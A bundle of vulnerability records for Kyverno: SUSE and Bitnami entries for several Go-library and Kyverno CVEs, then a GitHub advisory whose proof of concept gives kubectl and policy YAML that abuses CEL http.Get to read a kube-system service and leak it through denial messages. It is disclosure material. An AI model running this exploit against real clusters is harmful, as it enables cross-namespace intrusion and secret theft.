"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kyverno-zsh-completion-1.17.2-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64"
},
"product_reference": "kyverno-zsh-completion-1.17.2-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-1229",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-1229"
}
],
"notes": [
{
"category": "general",
"text": "The CombinedMult function in the CIRCL ecc/p384 package (secp384r1 curve) produces an incorrect value for specific inputs. The issue is fixed by using complete addition formulas.\nECDH and ECDSA signing relying on this curve are not affected.\n\nThe bug was fixed in v1.6.3 https://github.com/cloudflare/circl/releases/tag/v1.6.3 .",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-1229",
"url": "https://www.suse.com/security/cve/CVE-2026-1229"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-04-25T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2026-1229"
},
{
"cve": "CVE-2026-24051",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-24051"
}
],
"notes": [
{
"category": "general",
"text": "OpenTelemetry-Go is the Go implementation of OpenTelemetry. The OpenTelemetry Go SDK in version v1.20.0-1.39.0 is vulnerable to Path Hijacking (Untrusted Search Paths) on macOS/Darwin systems. The resource detection code in sdk/resource/host_id.go executes the ioreg system command using a search path. An attacker with the ability to locally modify the PATH environment variable can achieve Arbitrary Code Execution (ACE) within the context of the application. A fix was released with v1.40.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-24051",
"url": "https://www.suse.com/security/cve/CVE-2026-24051"
},
{
"category": "external",
"summary": "SUSE Bug 1259133 for CVE-2026-24051",
"url": "https://bugzilla.suse.com/1259133"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-04-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-24051"
},
{
"cve": "CVE-2026-33186",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-33186"
}
],
"notes": [
{
"category": "general",
"text": "gRPC-Go is the Go language implementation of gRPC. Versions prior to 1.79.3 have an authorization bypass resulting from improper input validation of the HTTP/2 `:path` pseudo-header. The gRPC-Go server was too lenient in its routing logic, accepting requests where the `:path` omitted the mandatory leading slash (e.g., `Service/Method` instead of `/Service/Method`). While the server successfully routed these requests to the correct handler, authorization interceptors (including the official `grpc/authz` package) evaluated the raw, non-canonical path string. Consequently, \"deny\" rules defined using canonical paths (starting with `/`) failed to match the incoming request, allowing it to bypass the policy if a fallback \"allow\" rule was present. This affects gRPC-Go servers that use path-based authorization interceptors, such as the official RBAC implementation in `google.golang.org/grpc/authz` or custom interceptors relying on `info.FullMethod` or `grpc.Method(ctx)`; AND that have a security policy contains specific \"deny\" rules for canonical paths but allows other requests by default (a fallback \"allow\" rule). The vulnerability is exploitable by an attacker who can send raw HTTP/2 frames with malformed `:path` headers directly to the gRPC server. The fix in version 1.79.3 ensures that any request with a `:path` that does not start with a leading slash is immediately rejected with a `codes.Unimplemented` error, preventing it from reaching authorization interceptors or handlers with a non-canonical path string. While upgrading is the most secure and recommended path, users can mitigate the vulnerability using one of the following methods: Use a validating interceptor (recommended mitigation); infrastructure-level normalization; and/or policy hardening.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-33186",
"url": "https://www.suse.com/security/cve/CVE-2026-33186"
},
{
"category": "external",
"summary": "SUSE Bug 1260085 for CVE-2026-33186",
"url": "https://bugzilla.suse.com/1260085"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-04-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-33186"
},
{
"cve": "CVE-2026-34986",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-34986"
}
],
"notes": [
{
"category": "general",
"text": "Go JOSE provides an implementation of the Javascript Object Signing and Encryption set of standards in Go, including support for JSON Web Encryption (JWE), JSON Web Signature (JWS), and JSON Web Token (JWT) standards. Prior to 4.1.4 and 3.0.5, decrypting a JSON Web Encryption (JWE) object will panic if the alg field indicates a key wrapping algorithm (one ending in KW, with the exception of A128GCMKW, A192GCMKW, and A256GCMKW) and the encrypted_key field is empty. The panic happens when cipher.KeyUnwrap() in key_wrap.go attempts to allocate a slice with a zero or negative length based on the length of the encrypted_key. This code path is reachable from ParseEncrypted() / ParseEncryptedJSON() / ParseEncryptedCompact() followed by Decrypt() on the resulting object. Note that the parse functions take a list of accepted key algorithms. If the accepted key algorithms do not include any key wrapping algorithms, parsing will fail and the application will be unaffected. This panic is also reachable by calling cipher.KeyUnwrap() directly with any ciphertext parameter less than 16 bytes long, but calling this function directly is less common. Panics can lead to denial of service. This vulnerability is fixed in 4.1.4 and 3.0.5.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-34986",
"url": "https://www.suse.com/security/cve/CVE-2026-34986"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-04-25T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-34986"
},
{
"cve": "CVE-2026-4789",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-4789"
}
],
"notes": [
{
"category": "general",
"text": "Kyverno, versions 1.16.0 and later, are vulnerable to SSRF due to unrestricted CEL HTTP functions.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-4789",
"url": "https://www.suse.com/security/cve/CVE-2026-4789"
},
{
"category": "external",
"summary": "SUSE Bug 1261190 for CVE-2026-4789",
"url": "https://bugzilla.suse.com/1261190"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-bash-completion-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-fish-completion-1.17.2-1.1.x86_64",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.aarch64",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.ppc64le",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.s390x",
"openSUSE Tumbleweed:kyverno-zsh-completion-1.17.2-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-04-25T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2026-4789"
}
]
}
bit-kyverno-2026-4789
Vulnerability from bitnami_vulndb
Kyverno, versions 1.16.0 and later, are vulnerable to SSRF due to unrestricted CEL HTTP functions.
{
"affected": [
{
"package": {
"ecosystem": "Bitnami",
"name": "kyverno",
"purl": "pkg:bitnami/kyverno"
},
"ranges": [
{
"events": [
{
"introduced": "1.16.0"
},
{
"fixed": "1.17.2"
}
],
"type": "SEMVER"
}
],
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
],
"aliases": [
"CVE-2026-4789"
],
"database_specific": {
"cpes": [
"cpe:2.3:a:kyverno:kyverno:*:*:*:*:*:*:*:*"
],
"severity": "Critical"
},
"details": "Kyverno, versions 1.16.0 and later, are vulnerable to SSRF due to unrestricted CEL HTTP functions.",
"id": "BIT-kyverno-2026-4789",
"modified": "2026-04-23T18:12:09.750Z",
"published": "2026-04-06T07:49:20.364Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/kyverno/kyverno"
},
{
"type": "WEB",
"url": "https://kb.cert.org/vuls/id/655822"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4789"
},
{
"type": "WEB",
"url": "https://portswigger.net/web-security/ssrf"
},
{
"type": "WEB",
"url": "https://www.kb.cert.org/vuls/id/655822"
}
],
"schema_version": "1.6.2",
"summary": "CVE-2026-4789"
}
GHSA-RGGM-JJMC-3394
Vulnerability from github – Published: 2026-04-14 22:37 – Updated: 2026-04-14 22:37
Summary
A Server-Side Request Forgery (SSRF) vulnerability in Kyverno's CEL HTTP library (pkg/cel/libs/http/) allows users with namespace-scoped policy creation permissions to make arbitrary HTTP requests from the Kyverno admission controller. This enables unauthorized access to internal services in other namespaces, cloud metadata endpoints (169.254.169.254), and data exfiltration via policy error messages.
Affected Versions
- Kyverno >= 1.16.0 (with `policies.kyverno.io` CRDs enabled, which is the default)
- Tested on: Kyverno v1.16.2 (Helm chart 3.6.2)
Details
The http.Get() and http.Post() functions available in CEL-based policies (policies.kyverno.io API group) do not enforce any URL restrictions. Unlike resource.Lib which enforces namespace boundaries for namespaced policies, the http.Lib allows unrestricted access to any URL.
Vulnerable Code: pkg/cel/libs/http/http.go
// Get backs the CEL http.Get() function: it issues an HTTP GET to the
// caller-supplied url from the admission controller's own network position.
// url comes straight from the policy expression, so whoever may create a
// policy chooses the destination.
func (r *contextImpl) Get(url string, headers map[string]string) (any, error) {
	// context.TODO() carries no deadline; any timeout that applies has to come
	// from the http.Client, which this excerpt does not show.
	req, err := http.NewRequestWithContext(context.TODO(), "GET", url, nil)
	// NO URL VALIDATION - no blocklist, no namespace restrictions
	...
}
Contrast with resource.Lib which enforces namespace:
// pkg/cel/libs/resource/lib.go
// Lib builds the CEL `resource` library for one policy and captures that
// policy's namespace in the lib; this is the parameter the http library
// (above) does not take at all.
func Lib(namespace string, v *version.Version) cel.EnvOption {
	return cel.Lib(&lib{namespace: namespace, version: v}) // Namespace enforced
}
This is a different code path from previously reported issues:
- GHSA-8p9x-46gm-qfx2: pkg/engine/apicall/apiCall.go (URLPath) - Fixed
- GHSA-459x-q9hg-4gpq: pkg/engine/apicall/executor.go (Service.URL) - Different feature (apiCall vs CEL http)
- This issue: pkg/cel/libs/http/http.go (CEL http.Get/http.Post) - Not fixed at the time of this report (the affected-range metadata below records the version that carries the fix)
PoC
Tested on Kyverno v1.16.2 (Chart 3.6.2) on Kubernetes v1.35.0 (kind).
A complete automated PoC script is attached. Manual steps below:
1. Setup attacker with namespace-scoped permissions
# Step 1: the attacker principal. Note how little it needs: a namespaced Role
# granting create on configmaps (the trigger) and on
# namespacedvalidatingpolicies (the SSRF vehicle). No cluster-scoped rights.
kubectl create namespace attacker-ns
kubectl create serviceaccount namespace-admin -n attacker-ns
cat <<EOF | kubectl apply -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: namespace-admin-role
  namespace: attacker-ns
rules:
  # configmaps: creating one in attacker-ns is what fires the policy (step 5).
  - apiGroups: [""]
    resources: ["configmaps"]
    verbs: ["create", "get", "list"]
  # namespaced policies only; the attacker never gets cluster-wide policy rights.
  - apiGroups: ["policies.kyverno.io"]
    resources: ["namespacedvalidatingpolicies"]
    verbs: ["create", "get", "list"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: namespace-admin-binding
  namespace: attacker-ns
subjects:
  - kind: ServiceAccount
    name: namespace-admin
    namespace: attacker-ns
roleRef:
  kind: Role
  name: namespace-admin-role
  apiGroup: rbac.authorization.k8s.io
EOF
2. Create sensitive internal service (simulating internal API or cloud metadata)
# Step 2: stand-in for an internal HTTP endpoint that the attacker cannot
# reach through the API server (step 3) but that the Kyverno controller can
# reach over the pod network. A cloud metadata endpoint would be hit the same way.
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: internal-api
  namespace: kube-system
  labels:
    app: internal-api
spec:
  containers:
    - name: server
      image: hashicorp/http-echo
      # Serves a fixed JSON body; the "secret"/"token" keys are what the
      # policy's messageExpression reads back out in step 4.
      args:
        - "-text={\"secret\": \"STOLEN_INTERNAL_SECRET_12345\", \"token\": \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9\"}"
        - "-listen=:8080"
---
apiVersion: v1
kind: Service
metadata:
  name: internal-api
  namespace: kube-system
spec:
  selector:
    app: internal-api
  ports:
    - port: 80
      targetPort: 8080
EOF
3. Verify attacker cannot access kube-system directly
# Step 3: RBAC does deny the attacker API access to kube-system. The SSRF in
# step 4 never goes through the API server, so this check is not in its path.
kubectl auth can-i get pods -n kube-system --as=system:serviceaccount:attacker-ns:namespace-admin
# Output: no
4. Create malicious NamespacedValidatingPolicy (as attacker)
# Step 4: the policy is created using only the namespaced Role from step 1.
# http.Get() below executes inside the Kyverno admission controller, with that
# pod's network reachability rather than the attacker's.
cat <<EOF | kubectl apply --as=system:serviceaccount:attacker-ns:namespace-admin -f -
apiVersion: policies.kyverno.io/v1beta1
kind: NamespacedValidatingPolicy
metadata:
  name: cel-ssrf-poc
  namespace: attacker-ns
spec:
  matchConstraints:
    resourceRules:
      # Fires on any ConfigMap create in attacker-ns — the trigger in step 5.
      - apiGroups: [""]
        apiVersions: ["v1"]
        operations: ["CREATE"]
        resources: ["configmaps"]
  variables:
    # Cross-namespace fetch: nothing in the Role grants access to kube-system.
    - name: stolenData
      expression: |
        http.Get('http://internal-api.kube-system.svc.cluster.local')
  validations:
    # "false" forces a denial, and the denial message carries the fetched body
    # back to the API client (step 6) — that is the exfiltration channel.
    - expression: "false"
      message: "Validation failed"
      messageExpression: |
        'SSRF_LEAKED: secret=' + variables.stolenData['secret'] + ' token=' + variables.stolenData['token']
EOF
5. Trigger exploit and exfiltrate data
# Step 5: any ConfigMap create in attacker-ns fires the policy; the webhook
# performs the fetch and returns its result in the denial message.
kubectl create configmap trigger --from-literal=x=y -n attacker-ns \
  --as=system:serviceaccount:attacker-ns:namespace-admin
6. Result - Secret data exfiltrated
